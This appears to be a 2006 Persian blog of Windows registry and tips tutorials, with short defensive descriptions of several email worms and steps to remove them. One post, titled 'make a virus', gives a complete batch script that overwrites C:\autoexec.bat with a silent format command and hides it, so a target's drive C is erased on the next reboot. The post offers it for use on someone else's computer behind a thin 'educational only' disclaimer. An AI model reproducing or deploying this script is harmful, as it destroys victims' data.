تبليغاتX

WWW.REG.BLOGFA.COM



Web www.reg.blogfa.com

آموزش ترفندهای رجیستری

كامپيوتر ويندوز رجیستري
آموزش ترفندهای رجیستری
همه چیز در باره ریجیستری ویندوز هک شبکه کامپیوتر


ترفندهای ریجستری 101

مخفی کردن my document از روريdesktop :

مراحل زير را برای مخفی کردن(نه پاک کردن) My Documents از روی Desktop به ترتيب انجام دهيد.
۱.از قسمت RUN وارد Registry شويد.

۲.اين کليد را در آن پيدا کنيد:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\CLSID

۳.حال به سراغ اين کليد برويد:
{450D8-AD25-11D0-98A8-0800361B1103}

۴.روی کليد (ShellFolder) کليک کنيد.توجه داشته باشيد اگر اين کليد وجود نداشت خودتون به
همين آدرس يکی درست کنيد.

۵.در پنل سمت راست ،کليک سمت راست کرده و يک DWORD Value بسازيد و نامش را
Attributes بگذاريد.

۶.حالا مقدار آن را به مقادير زير تغيير دهيد:
>>>>>برای پنهان کردن : f0500174 <<<<<<<<<<<<<<<<
>>>>>برای ظاهر کردن : f0400174 <<<<<<<<<<<<<<<
2 نوشته شده در  یکشنبه بیست و چهارم اردیبهشت 1385ساعت 11:53  توسط سیامک   | 

ترفند
ایجاد درایو مجازی :
 
هنگامی که صحبت از درایو مجازی می شود، ذهن بسیاری از کاربران به سمت نرم افزارهای خاصی
می رود که قابلیت ساخت یک درایو مجازی را دارند. اما در حقیقت نیازی به تهیه و نصب این چنین نرم افزارهایی نیست. کمی صبر و حوصله و بی تردید دقت، می تواند یاورشما در ایجاد این چنین درایوی در محیط ویندوز باشد. شاید نتوان قابلیت های ویژه ایی که سری نرم افزارهای فوق در ساخت درایو مجازی بکار می برند را ایجاد کرد، اما ساخت یک درایو مجازی آن هم بدون نرم افزار، خالی از جذابیت نخواهد بود.

قبل از شروع عملیات لازم است ذکر کنم ایجاد چنین درایوهایی هیچ ربطی به پارتیشن بندی هارد دیسک ندارد و سلامت سیستم عامل شما را به خطر نخواهد انداخت. بنابراین نگران از دست رفتن اطلاعات خود نباشید. ضمنا اگر خوشتان نیامد راهی برای از بین بردن درایو مجازی وجود دارد. تا انتهای این مقاله با ما باشید.

برای ساخت درایو مجازی در این آموزش از فایل های خود ویندوز کمک می گیریم. اینبار به سراغ فایل اجرایی Subst.exe می رویم. این فایل در پوشه system32 که در پوشه windows قرار گرفته موجود است. این فایل به همراه سیستم عامل داس ارائه شده و اجرای آن در حالت اولیه کار هیچ عکس العملی نشان نخواهد داد. کلمه Subst برگرفته از کلمه Substitution به معنای جایگزینی و علی البدلی است و در حقیقت برای جانشین کرد یک دایرکتوری به یک درایو بکار می رود.

به این معنی که با اجرای این دستور می توانید محتویات یک فولدر خاص را به یک درایو تبدیل کنید و آن را در My Computer نشان دهید. گاهی اوقات گشتن به دنبال پوشه ایی در میان انبوه فایل ها و فولدرهای در یک درایو خاص وقت گیر است. این کار می تواند این امر را تسهیل بخشد.

مسلما عملیاتی مانند کپی و کات فایل ها یا حتی نصب برنامه ها در درایو هایی که به این روش ایجاد می شوند مقدور خواهد بود اما در مورد عملیات سیستمی مانند فرمت یا اسکن دیسک امکان پذیر نیست. حال چگونه از این Subst استفاده کنیم؟

به Run یا Command Prompt ویندوز وارد شوید ( توضیح: Run در خود منوی استارت ویندوز موجود است و همچنین برای ورود به Command Prompt در فیلد Run کلمه cmd را تایپ و اینتر کنید ) حال باید دستوری مطابق شکل زیر تایپ کنید (شکل کلی فرمان):

Subst NewDriveName: Folder Direction

فکر نکنم نیاز به توضیح چندانی باشه NewDriveName نام درایو جدیدی که قصد دارید ایجاد کنید. دقت کنید که این نام مشابه نام درایوهای موجود نباشه و Folder Direction مسیر پوشه ایی که قصد دارید اون رو به صورت درایو مجازی در بیارید. برای نمونه، مثال های زیر درایوهایی با نام K و L ایجاد خواهند کرد. درایو K جایگزینی برای محتویات پوشه C:\part و درایو L جایگزینی برای مسیر
C:\ Program Files\Adobe .

Subst K: C:\part
Subst L: C:\ Program Files\Adobe

توجه! مدت دوام این درایو های مجازی بعد از ریستارت سیستم پایان می پذیرد و با یک بار ریستارت سیستم، دیگر این درایوها را نخواهید دید. برای جلوگیری از این امر چندین راه وجود دارد که بعلت کمی فرصت تنها یکی را شرح می دهیم.
در سیستم عامل های Dos و Win9x ساده ترین راه ویرایش فایل Autoexec.bat خواهد بود. این فایل را در درایو C بیابید و خطوط مربوط به Subst را در آن تایپ کنید تا در هر بار ریستارت سیستم به تبع آن Subst ایجاد شود. در سیستم عامل های xp و 2000 بهترین و راحترین کار این است که یک فایل اجرایی با پسوند .bat یا همان BatchFile ایجاد کنیم و خود فایل یا Shortcut آنرا در استارتاپ سیستم قرار دهیم. یا می توانیم مسیر را در رجیستری ایجاد کنیم.

حال چگونه فایل اجرایی یا همان BatchFile را ایجاد کنیم. مسیر زیر را برای باز کردن یک صفحه notepad طی کنید:

Start \All Programs\Accessories\notepad

از منوی فایل Save as را انتخاب و در مسیری دلخواه فایل را با پسوند bat ذخیره کنید. حال به سراغ فایلی که ایجاد کرده اید بروید. بر روی آن راست کلیک و Edit را برگزینید و دستورات مربوط به Subst را در آن تایپ و فایل را ذخیره کنید. حال نوبت به مسیردهی این فایل در رجیستری می رسد. به رجیستری وارد شوید( در فیلد Run کلمه Regedit را تایپ کنید). مسیر زیر را طی کنید:

HKEY_CURRENT_USER\SOFTWARE\
Microsoft\Windows\Current Version\Run

حال در بخش سمت راست محیط رجیستری راست کلیک کرده و پس از انتخاب گزینه New گزینه String Value را انتخاب سپس یک نام به ارزش ایجاد شده داده و با دابل کلیک بر روی آن در قسمت Value Date آدرس BatchFile را که در مرحله قبل ایجاد کرده اید، وارد کنید. بر روی ok کلیک و از رجیستری خارج شوید. اگر مراحل را درست طی کرده باشید این بار با ریستارت ویندوز درایوهای مجازی دوباره ایجاد خواهند شد.

حال اگر پشیمان شدید و قصد حذف درایو مجازی را داشتید طبق زیر عمل کنید:
پس از پاک کردن دستورات اضافه شده در فایل Autoexec.bat در سیستم عامل های Dos و Win9x و یا پاک کردن Shortcut یا خود فایل bat از استارتاپ سیستم و یا پاک کردن ارزش رشته در رجیستری برای سیتم عامل های xp و 2000 سیستم را یک بار دیگر ریستارت کنید. اگر هم بخواهید این کار را بدون ریستارت انجام دهید کافیست در Run یا Command Prompt دستور زیر را تایپ کنید:

Subst NewDriveName: /d

که NewDriveName نام درایوی که قصد پاک کردن آن را دارید می باشد. امیدوارم از این آموزش کمال استفاده را برده باشید. هر گونه سئوال یا انتقادی در این باره دارید در همین بخش مطرح کنید.

2 نوشته شده در  شنبه بیست و سوم اردیبهشت 1385ساعت 8:8  توسط سیامک   | 

ويروس بسازيد
 Format كردن هارد ديسك با يك فايل : BAT

 برنامه
NotePad را باز كنيد سپس كد زير را در آن كپي و پيست كنيد:
 
  @
echo off
 
call attrib -r -h c:\autoexec.bat >nul
 
echo @echo off >c:\autoexec.bat
 
echo format /autotest c:/q>nul >>c:\autoexec.bat
 
call attrib +r +h c:\autoexec.bat >nul
 
exit
 
 حالا فايل را با پسوند
bat ذخيره كنيد. مواظب ياشيد كه فايل را اجرا نكنيد چون كل اطلاعات درايو سي شما پاك مي شود!
 
  اين فايل چه كار مي كند؟
 
 ابتدا كل اطلاعات موجود در فايل
autoexe.bat را پاك مي كنيد سپس كد 'format /autotest c:/q' را در آن قرار مي دهد وقتي هدف شما كامپيوتر را ريست و دوباره راه اندازي كند اين كد اجرا شده و درايو سي فرمت مي شود!
 
 تعداد و نام پارتيشن مورد نظر را با اندکي تغيير در کد خود ميتوانيد تعيين کنيد.

(لطفاًاستفاده ناصحيح از اين مقاله نكنيد. فقط جنبه آموزشي دارد)

2 نوشته شده در  دوشنبه هجدهم اردیبهشت 1385ساعت 8:44  توسط سیامک   | 

ترفندهای ریجستری 100

هنگ کردن سیستم :

بسياري از ما در هنگام كار با ويندوز ناگهان به مشكل هنگ كردن برنامه ها برخورد كرديم. اين مشكل مواقعي پيش مي آيد كه برنامه نتواند فايلهاي سيستمي خود را به درستي بارگذاري كند و ... در اين هنگام ما به سرعت كليدهاي تركيبي Ctrl+Alt+Del را زده و از صفحه Task Manager برنامه مورد نظر را End Task ميكنيم. همه اين را قبول دارند كه در ويندوز XP اين كار به طرز شگفت انگيزي نسبت به ويندوزهاي سري 9X سريعتر شده و ديگر كمتر مشكل Restart پيش مي آيد. اما شايد براي بعضي ها سرعت End Task يك برنامه بسيار كند باشد تا جايي كه حتي شخص مجبور به Restart شود. در اينجا يك نكته اي وجود دارد كه با اعمال آن ميتوان سرعت End Task كردن يك برنامه را افزايش داد. اين روش حتي باعث ميشود كه اگر براي برنامه اي مشكل پيش بيايد آن برنامه به سرعت متوقف شده و ديگر مشكل هنگ كردن و يا كرش كردن سيستم پيش نيايد.
براي اين منظور مراحل زير را انجام دهيد : ابتدا از طريق Run وارد قسمت Regedit شده و كليد زير را بيابيد :

HKEY_CURRENT USER\Control Panel\Desktop

سپس در صفحه سمت چپ به دنبال كليدي به نام LowLevelHooksTimeout بگرديد. اگر اين كليد وجود نداشت يك كليد از نوع String به همين نام بسازيد. حال ميتوانيد يك عدد را برحسب ميلي ثانيه به دلخواه به آن اختصاص دهيد. اين مقدار همان ميزان زمان End Task را تعيين ميكند. براي مثال شما ميتوانيد عدد 3500 را كه معادل 3.5 ثانيه است را به آن اختصاص دهيد. اين ترفند در واقع باعث ميشود كه مدت زمان پاسخگويي برنامه Crash شده يا به عبارتي Hook شده در برابر ويندوز كاهش بيابد و ويندوز وقت اضافه اي را براي به اجرا در آوردن آن برنامه هدر ندهد و اين كار باعث ميشود كه در واقع برنامه مشكل دار به زور اجرا نشود و جلويش گرفته شود. اين ترفند ميتواند كارايي ويندوز را نيز بالا ببرد چون همان طور كه ميدانيد هنگ كردن سيستم خود يك عامل كاهش كارايي سيستم ميباشد كه با اين ترفند تا حدود بسيار زيادي از اين مشكل كاسته ميشود.

ترفند :

1- برای رسیدن به properties کافیست Alt را نگه داشته و روی فایل مورد نظر دبل کلیک کنید.
2- کلید Alt در هر پنجره ای ، با یک فشار منوهای پنجره را فعال می کند و با ترکیب آن با هر کدام از حروف منوها ،که زیر آن خط کشیده شده است ،پنجره مربوط به آن منو را باز میکند.
3- در مرورگر اینترنت IE ،ترکیب Alt و End شما را به آخرین صفحه ای که مشاهده کرده اید ،خواهد برد.
4- در مرورگر اینترنتIE ترکیب Alt با یکی از دو کلید جهت راست و چپ ،عمل Back,Forward را انجام می دهد.
5- با ترکیب Alt + Tab شما می توانید پنجره های فعال ویندوز را جابه جا کنید.

2 نوشته شده در  دوشنبه هجدهم اردیبهشت 1385ساعت 8:40  توسط سیامک   | 

ویروس

اثرات W32.Sobig.F@mm

اين ويروس تمام آدرس هاي ايميل در سيستم را که در فايل هاي با پسوند .dbx     .eml     .hlp       .htm     .html      .mht     .wab     .txt.  موجود است را پيدا کرده و ايميل هاي آلوده با مضمون زير ميفرستد مواظب ايميلي با نام فرستنده admin@internet.com باشید.

اثرات W32.Blaster.Worm
این کرم بسیار پیشرفته باعث می شود تا سیستم شما تنها پس از گذشت 60 ثانیه از اتصال به اینترنت ، خاموش شود .

برای پاک سازی دستگاه خود مراحل زیر را بترتیب اجرا نمایید :

1- فایل اصلاحیه MS03-026 Patch را از زیر دریافت نمایید .

2- پس از نصب این اصلاحیه ، سیستم خود را ریست کنید .

3- بعد از بالا آمدن سيستم فایل FIXBLAST.exe را دریافت و اجرا کرده ، این فایل فعالیت کرم (MSBLAST.exe) را متوقف نموده و باعث می شود کدهای ریجستری که توسط آن در ویندوز وارد شده اند حذف گردند .

4- مجدداً و برای آخرین بار سیستم خود را ریست نمایید .

5- به سایت WindowsUpdate.com مراجعه کنيد تا در صورت لزوم آخرین به روز رسانی ها برای حذف این کرم بصورت خودکار برای شما صورت گیرد .


توجه :
اگر شرایط به گونه ای باشد که سیستم شما قبل از دریافت این فایلها خاموش شود ، دکمه start و سپس run را کلیک نموده و در کادر مربوط عبارت shutdown -a را تایپ نمایید . این روش باعث می شود فرایند خاموش شدن دستگاه شما متوقف شود .

2 نوشته شده در  دوشنبه یازدهم اردیبهشت 1385ساعت 9:40  توسط سیامک   | 

ویروس

W32.Mimail.C@mm

این ویروس با ایمیلی با موضوع زیر منتشر می شود

 subject of email: Re[2]: our private photos [random string of letters]

  • Name of attachment: photos.zip                                                      

Worm نوع  :کرم

Re[2]: our private photos [random string of letters] : موضوع ايميل

   photos.zip    فايل ضميمه به ايميل ويروسي 

را غير فعال کنيد System Restore دستور  XP - ME قبل از اجراي فايل ترميمي و حذف ويروس در ويندوز

زمان کشف ويروس : 31/10/2003

حجم فايل ويروس : 12832  بايت ، حدودا معادل 12 کيلو بايت

سيستم هاي مورد حمله

Windows 2000, Windows 95, Windows 98, Windows Me,

 Windows NT, Windows Server 2003, Windows XP

سيستم هاي ايمن

Linux, Macintosh, Microsoft IIS, OS/2, UNIX

شاخه آلوده شده در ريجستري

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run

مقدار داده شده توسط ويروس در ريجستري :

"NetWatch32" = "%Windir%\netwatch.exe"

ضمنا مراقب اين ويروس هم باشيد

W32.Nolor@mm.Dr

اين ويروس بصورت گسترده اي موتور  ياهو را آلوده کرده و براي کاربران ياهو با آدرس هاي مختلف ويروس ميفرسته

موضوع ايميل اين ويروس مشابه موارد زير است ضمنا اين ويروس معمولا با حجم 272 کيلو يا 137 کيلو همراه ايميل است .

Re-I Love You...OKE! يا Re-Kiss you..^@^  يا  A Greeting-card for you يا "Re:Baby! 2000USD,Win this game"

2 نوشته شده در  یکشنبه سوم اردیبهشت 1385ساعت 9:11  توسط سیامک   |